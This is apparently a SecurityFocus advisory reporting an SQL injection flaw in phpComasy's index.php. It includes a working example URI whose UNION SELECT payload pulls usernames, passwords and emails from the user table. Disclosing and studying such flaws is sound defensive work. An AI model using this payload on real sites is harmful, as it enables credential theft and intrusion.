phpComasy 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user


 

Privacy Statement
Copyright 2010, SecurityFocus